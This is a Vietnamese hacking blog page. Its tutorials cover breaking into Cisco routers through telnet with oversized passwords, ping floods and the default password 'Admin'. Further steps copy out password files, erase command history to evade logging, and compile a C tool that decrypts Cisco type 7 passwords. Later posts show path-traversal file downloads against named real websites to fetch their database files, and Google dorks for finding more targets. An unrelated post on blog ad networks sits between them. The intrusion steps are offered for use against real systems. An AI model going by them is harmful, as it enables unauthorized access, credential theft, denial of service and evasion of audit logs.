Liệu lệnh Ping có tác hại gì không , chắc chắn tôi sẽ nhận được 1 câu trả lời rằng không . Nhầm rồi các bạn ạ . 1 hệ thống có thể bị Crash nếu ta gửi hàng loạt lệnh ping đến ( Ping floods ) .
8 .Cách sử dụng TraceRoute
Để đánh dấu tất cả kết nối của bạn , và nhìn thấy tất cả các máy tính có giữa bạn và 1 đích . Bạn chỉ việc mở MS-DOS prompt và gõ :
Trích dẫn:tracert ip.address(IP của 1 máy tính bất kỳ)
Bạn sẽ nhìn thấy 1 danh sách các máy tính giữa bạn và máy tính đích .
Bạn có thể sử dụng điều này để kiểm tra xem có friewall ngăn cách bất cứ cái gì . Và cũng cho phép bạn ai là ISP ( cung cấp dịch vụ mạng )
9 . Cách sử dụng một proxy server
Thôi cái này các bạn phải tự biết , Vì nếu mà không biết cách sử dụng Proxy thì đừng đọc bài này làm gì !
Ôi mệt quá ! Học kểu này phải nói hết ra những thứ cơ bản mệt phờ râu !
Bắt đầu Hack nào anh em :
I Cách tìm 1 cisco router ( hệ thống chạy cisco )
Việc tìm thấy một chương trình chuyển vận cisco là một nhiệm vụ khá dễ , gần nhưmỗi ISP sẽ ấn định tuyến đờng xuyên qua ít nhất một chương trình chuyển vận Cisco .
Cách dễ nhất để tìm thấy một chương trình chuyển vận cisco sẽ chạy một traceroute ( Bằng cách mở MS-DOS prompt gõ “tracert” và địa chỉ IP của bất cứ 1 máy tính nào . Xem lại cách sử dụng traceroute ở phần trên ) Khi đó nó sẽ cho ta thấy tât cả những hệ thống máy tính có giữa máy tính của bạn và của máy tính mà ban vua dùng để tracert . Một trong số những hệ thống này có lẽ sẽ có tên ” Cisco “
Ví du :
Trích dẫn:tracert 222.222.22.22Tracing route to [221.223.24.54]over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target’s isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.
Bạn nhìn thấy dòng số 5 cha : 5 101ms 102ms 133ms cisco.router [194.33.44.33]
Đây chính là 1 hệ thống chạy Cisco , Bạn hãy ghi nhớ IP của nó là 194.33.44.33 để chúng ta tấn công hê hê …
II Cách tấn công hệ thống Cisco
Một Cisco routers thường chạy bản V4.1 (mà hầu hết là vậy) . Ta có thể dễ dàng vô hiệu hoá được chúng .
Bắt đầu : Bạn hãy kết nối tới cổng 23 của hệ thống Cisco với IP đã có ở trên . (Chính là Telnet ấy mà , xem lại cách sử dụng ở trên) Nhưng nên nhớ phải thông qua proxy server (cái này tuỳ bạn)
Khi kết nối tới cổng 23 của server chạy Cisco thường thì bạn không cần nhập username , mà nó sẽ đòi password của bạn , lúc này bạn hãy nhập vào một chuỗi password khổng lồ bất kỳ như:
Trích dẫn:10293847465qpwoeirutyalskdjfhgzmxn cbv019dsk10293847465qpwo eirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutya lskdjfhgzmxn cbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019d sk10293847465 qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeir utyalskdjfhg zmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv 019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
Rồi Enter ! Bạn hãy chờ đợi , có thể hệ thống Cisco sẽ Reboot , Và cũng có thể bạn không thể Hack nếu nhưlúc này hệ thống đang ở chế độ offline .
Nhưng hãy thử chờ 2-10 phút , có thể bạn sẽ được login vào bên trong .
Nếu không xảy ra thì có lẽ nó không phải là chạy 1 software vul . Tại trờng hợp đó bạn hãy làm vài cái Dos attacks bằng cách gửi nhiều lệnh Ping đến hệ thống cho nó down đi cho bõ tức he he … Bằng cách vào MS-DOS prompt gõ :
ping -l 56550 cisco.router.ip -t —–> he he .. ai bảo không cho ông mày vào .
OK ! Cũng chả sao , trong khi đó bạn hãy lập lại 1 kết nối khác cung tới port 23 . Và đăng nhập mật khẩu là ” Admin ” .
Các bạn hỏi vì sao password lại la ” Admin ” . Xin tha rằng đây là password mặc định của chương trình chuyển vận Cisco . ha ha … Khi đó bạn có thể đăng nhập được vào hệ thống tạm thời , chỉ là tạm thời thôi nha , bởi vì nó sẽ dis bạn ra bất cứ lúc nào .
Bây giờ bạn đã đăng nhập thành công , hay mau tìm file password .
Bạn hãy gõ ” ? ” sẽ có 1 danh sách các lệnh dùng trong hệ thống hiện ra trước mắt bạn ( Tất nhiên bạn chỉ được quyền hạn sử dụng 1 số lệnh trong này thôi vì bạn chỉ là ngời tạm thời trong hệ thống , nhưng thế là đã quá đủ rồi ) Bạn sẽ nhìn thấy 1 lệnh di chuyển , 1 lệnh copy file , 1 lệnh edit file .. hãy dùng lệnh này để đến nơi chứa file password của Admin ( Mấy chú không biết gì về Nix thì phải xem lại nha ) . Khi tìm thấy file passwd thì hãy gửi về cho mình theo địa chỉ IP của chính mình tren port 23
Nhưng trước khi bạn có thể sent file về cho chính mình bạn phải thiết lập HyperTerminal để đợi tín hiệu từ Cisco Rout .
Bây giờ bạn sent 1 file từ hệ thống về máy bạn ,HyperTerminal sẽ hỏi bạn liệu bạn có chấp nhận file mà máy chủ gửi cho bạn , bạn đồng ý và tìm đờng dẫn cho file save lại
Vậy là bạn đã có trong tay file chứa password của 1 hệ thống chuyển vận Cisco .
File đó có thể là passwd ( nếu nó không bị mã hoá bởi shadow ) , Hoặc là file Shadow password . cũng có thể là master.passwd . Cái này phải tuỳ vào kinh nghiệm của mỗi ngời .
III Cách Crack File Password .
Bạn đã vợt qua được phần khó nhất rồi nên việc Crack này chỉ là chuyện nhỏ .
Cách tôt nhất là bạn nên dùng John the Ripper để Crack nó . Sử dụng cái này rất dễ , bạn chỉ việc đọc hớng dẫn của nó là OK .
Nhưng ngoài ra tôi cũng xin giới thiệu 1 chương trình khác , nó được viết ra chỉ để Crack password của hệ thống Cisco ( Các bạn nên phân biệt password của 1 server chứa website , vơí 1 server chạy Cisco nha , hoàn toàn khác nhau đấy ) . Chương trình này các bạn có thể biên tập trên Linux :
Trích dẫn:#include <stdio.h>#include <ctype.h>char xlat[] = {
0×64, 0×73, 0×66, 0×64, 0×3b, 0×6b, 0×66, 0×6f,
0×41, 0×2c, 0×2e, 0×69, 0×79, 0×65, 0×77, 0×72,
0×6b, 0×6c, 0×64, 0×4a, 0×4b, 0×44
};
char pw_str1[] = “password 7 “;
char pw_str2[] = “enable-password 7 “;
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] – ‘0′) * 10 + enc_pw[1] – ‘0′;
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] – ‘0′;
continue;
}
if(enc_pw[i] >= ‘A’ && enc_pw[i] <= ‘F’) {
val += enc_pw[i] – ‘A’ + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, “Usage: %s -p <encrypted password>\n”, pname);
fprintf(stdout, ” %s <router config file> <output file>\n”, pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == ‘-’)
{
switch(argv[1][1]) {
case ‘h’:
usage();
break;
case ‘p’:
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, “Error.\n”);
exit(1);
}
fprintf(stdout, “password: %s\n”, passwd);
break;
default:
fprintf(stderr, “%s: unknow option.”, pname);
}
return(0);
}
if((in = fopen(argv[1], “rt”)) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], “wt”)) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == ‘\r’)
i–;
if(line[i] == ‘\n’)
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, “%s\n”, line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, “Error.\n”);
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, “%s”, pw_str1);
else
fprintf(out, “%s”, pw_str2);
fprintf(out, “%s\n”, passwd);
}
}
}
Nếu bạn không chạy Linux , mà chạy Windown chẳng han . Thì bạn lại phải cần 1 chương trình brute-force , nó sẽ cho phép ban chay John the Ripper hoặc Password-Cracker trên Windown . Và sau đó hãy kiên nhẫn chờ đợi . Một hệ thống lớn đang nằm trong tay bạn .
IV Cách sử dụng Router Cisco
Bạn đã có trong tay 1 password của hên thống Cisco , bây giờ hãy làm chủ cái công nghệ tuyệt vời này . Bạn hãy Connect tới hệ thống (Bạn vẫn còn nhớ IP của nó chứ) với password hợp pháp . Nhưng nếu không muốn bị log IP thì hãy thông qua 1 proxy server .
Bạn đã đăng nhập được vào bên trong , Lúc này hệ thống sẽ ghi lại toàn bộ những hành động của bạn bên trong server (nó giống nhưcái History cua IE) . Bạn không muốn mình bị theo dõi như vậy thì hãy gõ lệnh sau :
terminal history size 0
Bây giờ nó sẽ không nhớ bất kỳ cái gì về bạn nữa , chúng ta có thể yên tâm mà khai thác sử dung Rounter này .
Bạn muốn cách sử dụng Rounter ? Hãy gõ ” ? ” , một loạt các danh sách lệnh của chương trinh Rounter Cisco hiện ra . Và bạn có thể sử dụng hầu hết nó .
Những chương trình vận chuyển Cisco thông thường cho telnet , như vậy bạn có thể dùng telnet kết nối với những hệ thống khác (Bạn thấy nó sớng không , Hack được 1 hệ thống ta có thể có quyền vào những hệ thống khác mà Cisco này đang làm việc)
Bạn có thể sử dụng hệ thống Rounter để chặn đứng các gói dữ liệu được chuyền tới và chuyền đi thông qua hệ thống Cisco này . Hoặc bạn có thể sao chép các dữ liệu các gói hàng , nhưng trong bài viết này tôi sẽ không đề cập đến vấn đề đó vì nó quá sức nguy hiểm
V. Lời Kết
Bạn đừng tức giận hay khóc khi mà không Hack được 1 hệ thống Cisco lần đầu tiên , và thậm chí cả sau này . Nó cần sự thực hành kiên nhẫn từ bạn chứ không như kiểu Hack server khác là 1 nhát được ngay .
Kiếm tiền trên Blog hoặc Website cá nhân Thứ năm, Tháng 3 20 2008
Thủ Thuật 2:05 sáng
Text Link Ads
Text Link Ads là một trong những hệ thống quảng cáo yêu thích của tôi. Họ giúp tôi kiếm tiền trên mạng bằng việc bán các text links (các liên kết bằng text đến các site khác). Các đường link này giúp tăng traffic cho các nhà quảng cáo cũng như giúp ích cho các bộ máy tìm kiếm (Search Engine) và có vẻ như người đọc không bị làm phiền vì chúng rất gọn gàng. Giá mỗi đường link của bạn sẽ được Text Link Ads quyết định và dựa vào Alexa, Google PageRank, số lượng người đọc RSS và các yếu tố khác.
http://www.text-link-ads.com/?ref=51434
Google AdSense
Nếu như bạn không biết Google AdSense là gì thì chắc hẳn là bạn đang sống trong rừng. Đây là điều bắt buộc bạn phải biết nếu bạn muốn kiếm tiền từ blog. Google hiện thị quảng cáo bằng hình ảnh và một đoạn văn bản đơn giản trên blog của bạn và chúng được hướng đến nội dung mà bạn viết. Google là một hệ thống kiếm tiền chắc chắn nhất cho blog của tôi.
https://www.google.com/adsense?ai=B5UyAZ_cOR5PCDJyO6QPMp4jeCYXP5ifN4JaEAsWNtwEAEAEYASC7lNIKOABQjd2JswFgwQWgAZeVyP0DsgEOd3d3LnBoYW1lbi5jb226AQ8xMjV4MTI1X2FzX3JpbWfIAQLaAUNodHRwOi8vd3d3LnBoYW1lbi5jb20vaW5kZXgucGhwLzIwMDcvMDcvMjcvdGFwLXRydW5nLXZhby10cm9uZy10YW0vgAIBwAIDqAMD6AMj&gclid=CPWI8LTMmpICFRIibwodBzCIAA
Bidvertiser
Bidvertiser là một hệ thống quảng cáo CPC (Cost Per Click – trả tiền theo mỗi click) đang cạnh tranh với Google Adsense. Lợi thế cơ bản của nó so với AdSense là nó có mức trả tiền thối thiểu rất thấp, chỉ $10. Bạn chỉ cần kiếm được $10 là đã có thể được thanh toán. Bạn có thể lựa chọn thanh toán qua Séc (check, cheque), hoặc là qua PayPal. Thanh qoán qua PayPal rất nhanh mà không mất bất cứ đồng phí nào. Những website hay blog lớn thường sẽ không quan tâm đến điều này, nhưng với rất nhiều các blog nhỏ thì việc chờ để đạt đến mức $100 mà Google đặt ra là quá lâu, do vậy lựa chọn việc được thanh toán ở mức thấp hơn là một điều khá hấp dẫn.
http://www.bidvertiser.com/bdv/BidVertiser/bdv_publisher.dbm
AdBrite
AdBrite cũng tương tự như Bidvertiser, là một hệ thống quảng cáo CPC. Ưu điểm của AdBrite là chấp nhận hầu như tất cả các site hay blog đăng ký tham gia không kể ngôn ngữ (trừ các site hay blog mang nội dung sexy, phản động). Mức trả tiền tối thiểu (minimum payout) của Adbrite cũng rất thấp, chỉ cần kiếm đủ $20 là bạn đã được AdBrite gửi séc đến tận nhà. Đây cũng là một lựa chọn tốt cho các site hay các blog bằng tiếng Việt.
http://www.adbrite.com/mb/landing_both.php?spid=24788&afb=125×125-1-white
Widgetbucks
Widgetbucks là chương trình quảng cáo CPC và đồng thời họ cũng trả cả tiền cho bạn khi có ai đó click vào quảng cáo và mua các sản phẩm mà họ chào bán. Mức tối thiểu để bạn được nhận tiền là $50. Đây là một chương trình mới đang thu hút được rất nhiều sự quan tâm của các webmaster và các blogger.
http://www.widgetbucks.com/home.page?referrer=1881004
AuctionAds
AuctionAds là một Affiliate lớn của eBay. Những gì mà AuctionAds làm là tập hợp các publisher (các nhà xuất bản website, chủ các website, các blog, các forum, v.v.) lại thành một “tập thể” lớn để tìm kiếm khoản chia sẻ doanh thu lớn hơn. Các publisher có thể là đòn bẩy để các sản phẩn đấu giá trên eBay được phân phối qua AuctionAds và AuctionAds có thể thu được kết quả cao hơn nhờ vào việc khuyến khích các publisher tham gia vào bán hàng cấp dưới của mình. Ngay từ bây giờ, các Affiliate sẽ nhận được 100% số tiền mà họ kiếm được từ hệ thống này. Bạn có thể kiếm tiền từ AuctionAds nhiều hơn là việc tham gia trực tiếp vào chương trình affiliate của eBay, chính vì thế hệ thống này đang gia tăng số lượng của mình.
http://www.auctionads.com/refer_ecca43c61d1dccbe907d
hack kiểu không giống ai bài 2 Thứ năm, Tháng 3 20 2008
hacking 1:52 sáng
xin lưu ý kiểu này không phải là hack source code của 1 ai cả
cái này bạn phải thực hành uyển chuyển mà thôi
vd tôi thay file default.asp bằng admin.asp thì sao
đây là nạn nhân: http://msystems.co.kr/fileupload/download.asp?file=admin.asp
phucjimy , hero_zero
tùy các bạn mà thôi
vd:
http://www.provincia.so.it/download.asp?file=default.asp
load về sẽ thấy dòng <!–#INCLUDE VIRTUAL=”/include/connettiDB.asp”–>
và tiếp tục
http://www.provincia.so.it/download.asp?file=include/connettiDB.asp
load về sẽ thấy dòng
<!–#INCLUDE VIRTUAL=”include/connOpen.asp”–>
và tiếp tục
http://www.provincia.so.it/download.asp?file=include/connOpen.asp
load về và xem sẽ thấy
percorsoDatabase=”/database/DBSito.mdb”
http://www.provincia.so.it/download.asp?file=database/DBSito.mdb
xong chuyện gì đến cũng đã đến
link demo ví dụ
http://www.aido-bz.it/dl.php?file=
http://www.jcdecaux.lt/dl.php?file=
http://www.provincia.so.it/download.asp?file=
http://www.guna.it/C_Common/Download.asp?file=
http://www.thaifilm.com/inc/download.asp?file=
http://www.maiden.gov.uk/download.asp?file=
http://www.mrzstandard.com/inc/download.asp?file=
(thank vnit)
hack kiểu không giống ai (nhưng rất hay và tạo khả năng tư duy) Thứ năm, Tháng 3 20 2008
hacking 1:44 sáng
vào google và gõ key search : http://google.com gõ keyword: allinurl: “download.asp?file=” hoặc
allinurl: “download.php?file=” hoặc
allinurl: “dl.asp?file=” hoặc
allinurl: “dl.php?file=” ….
hôm sau post tiếp cho
